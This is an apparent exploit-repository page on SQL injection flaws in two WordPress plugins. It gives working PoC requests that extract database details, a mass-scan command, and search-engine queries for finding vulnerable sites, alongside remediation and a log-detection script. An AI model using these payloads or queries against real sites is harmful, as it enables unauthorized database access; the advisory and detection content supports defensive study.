## https://sploitus.com/exploit?id=10F0DB1F-BB40-5E20-844A-96B30ABF7457
---
# WP-SQL Injection Vulnerabilities: CVE-2024-2876 and CVE-2024-3495
This repository documents two SQL injection vulnerabilities affecting WordPress plugins. Below are descriptions, queries, proof of concept (PoC) scripts, and remediation steps for each vulnerability.
## Vulnerability Descriptions
### Description - CVE-2024-2876
The **Email Subscribers by Icegram Express** plugin for WordPress (versions up to and including 5.7.14) is vulnerable to SQL injection in the `run` function of the `IG_ES_Subscribers_Query` class. Because the user-supplied input is neither sufficiently escaped nor bound through a prepared query, unauthenticated attackers can append SQL to the subscriber query and potentially read sensitive data from the database.
### Description - CVE-2024-3495
The **Country State City Dropdown CF7** plugin for WordPress (versions up to and including 2.7.2) is vulnerable to SQL injection via the `cnt` and `sid` parameters. Insufficient escaping of these parameters allows unauthenticated attackers to execute arbitrary SQL, giving them unauthorized access to sensitive database information.
## Scanner Script
To scan one host or a list of hosts for CVE-2024-2876 and CVE-2024-3495 with the bundled script, run:
```bash
python3 CVE-2024-2876.py -u http://website.com
python3 CVE-2024-2876.py -f urls.txt
```
## Querying for Affected Sites
### Query for CVE-2024-2876
- **FOFA**: `body="/wp-content/plugins/email-subscribers/"`
- **publicwww**: `"/wp-content/plugins/email-subscribers/"`
### Query for CVE-2024-3495
- **FOFA**: `body="/wp-content/plugins/country-state-city-auto-dropdown" && header="HTTP/1.1 200 OK"`
- **Publicwww**: `"/wp-content/plugins/country-state-city-auto-dropdown"`
- **Shodan**: `"http.title:admin-ajax.php"`
## Proof of Concept (PoC) Code Blocks
### PoC - CVE-2024-2876
Example exploit request for the SQL injection via the `admin-post.php` endpoint. The injected `sleep(4)` makes this a time-based check, so allow a request timeout of about 20 s when replaying it (for example in Burp Suite):
```http
POST /wp-admin/admin-post.php HTTP/1.1
Host: <Host>
Content-Type: application/x-www-form-urlencoded

page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111
```
### PoC - CVE-2024-3495
Example exploit request via `admin-ajax.php` (`{{nonce}}` is a placeholder for the plugin's AJAX nonce):
```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: <Host>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 172

action=tc_csca_get_states&nonce_ajax={{nonce}}&cnt=1+or+0+union+select+concat(0x64617461626173653a,database(),0x7c76657273696f6e3a,version(),0x7c757365723a,user()),2,3--+-
```
## Remediation Steps
### Remediation for CVE-2024-2876
- **Upgrade**: Update the plugin to version 5.7.15 or later (preferably 5.7.19).
- **Automatic Updates**: Patchstack users can enable automatic updates for vulnerable plugins.
- **WAF/WAAP**: Implementing a Web Application Firewall (WAF) or Web Application and API Protection (WAAP) solution can offer protection against known vulnerabilities by blocking suspicious SQL patterns.
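As an added example (not part of this repository or of either plugin), the following Python classifier applies the request shapes from the two PoCs above to logged POST bodies, the kind of check a WAF rule or log-review script would make. The `es_subscribers`, `advanced_filter[...][field]`, `tc_csca_get_states`, `cnt` and `sid` names come from the requests on this page; the `SAMPLE_LOG` entries are constructed.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs

COLUMN_NAME = re.compile(r"[A-Za-z0-9_.]+")  # legitimate advanced_filter field values
NUMERIC_ID = re.compile(r"\d+")              # legitimate cnt / sid values


def classify_request(path: str, body: str) -> Optional[str]:
    """Return the CVE id whose request pattern a logged POST matches, else None.

    body is the raw x-www-form-urlencoded POST body (from a WAF, reverse proxy
    or body-logging module; plain access logs do not carry it). Allowlisting
    the expected shape of each parameter is more robust than matching SQL keywords.
    """
    params = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}

    if path.endswith("/wp-admin/admin-post.php") and params.get("page") == "es_subscribers":
        # CVE-2024-2876: advanced_filter[...][field] should be a bare column name.
        for key, val in params.items():
            if key.startswith("advanced_filter[") and key.endswith("[field]"):
                if not COLUMN_NAME.fullmatch(val.strip()):
                    return "CVE-2024-2876"

    if path.endswith("/wp-admin/admin-ajax.php") and params.get("action") == "tc_csca_get_states":
        # CVE-2024-3495: cnt and sid are numeric ids; anything else is injected SQL.
        for key in ("cnt", "sid"):
            val = params.get(key)
            if val is not None and not NUMERIC_ID.fullmatch(val.strip()):
                return "CVE-2024-3495"
    return None


def scan_log(entries: List[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """Return (path, cve) for each (path, body) entry that matches a pattern."""
    return [(p, cve) for p, b in entries if (cve := classify_request(p, b))]


# Constructed sample traffic: the two PoC bodies above plus benign equivalents.
SAMPLE_LOG = [
    ("/wp-admin/admin-post.php",
     "page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]="
     "status=1)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]=="),
    ("/wp-admin/admin-post.php",
     "page=es_subscribers&advanced_filter[conditions][0][0][field]=status"
     "&advanced_filter[conditions][0][0][operator]=="),
    ("/wp-admin/admin-ajax.php",
     "action=tc_csca_get_states&nonce_ajax=abcd1234&cnt=1+or+0+union+select+1,2,3--+-"),
    ("/wp-admin/admin-ajax.php", "action=tc_csca_get_states&nonce_ajax=abcd1234&cnt=101"),
]
```

Running `scan_log(SAMPLE_LOG)` flags the first and third entries only; the same allowlist logic is what the patched plugins should enforce server-side, a WAF rule is only a stopgap until the upgrade is applied.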
## Bounty Information - CVE-2024-2876
For more information on the CVE and bounty details, visit:
- [Wordfence Blog on CVE-2024-2876](https://www.wordfence.com/blog/2024/04/1250-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-email-subscribers-by-icegram-express-wordpress-plugin/)
---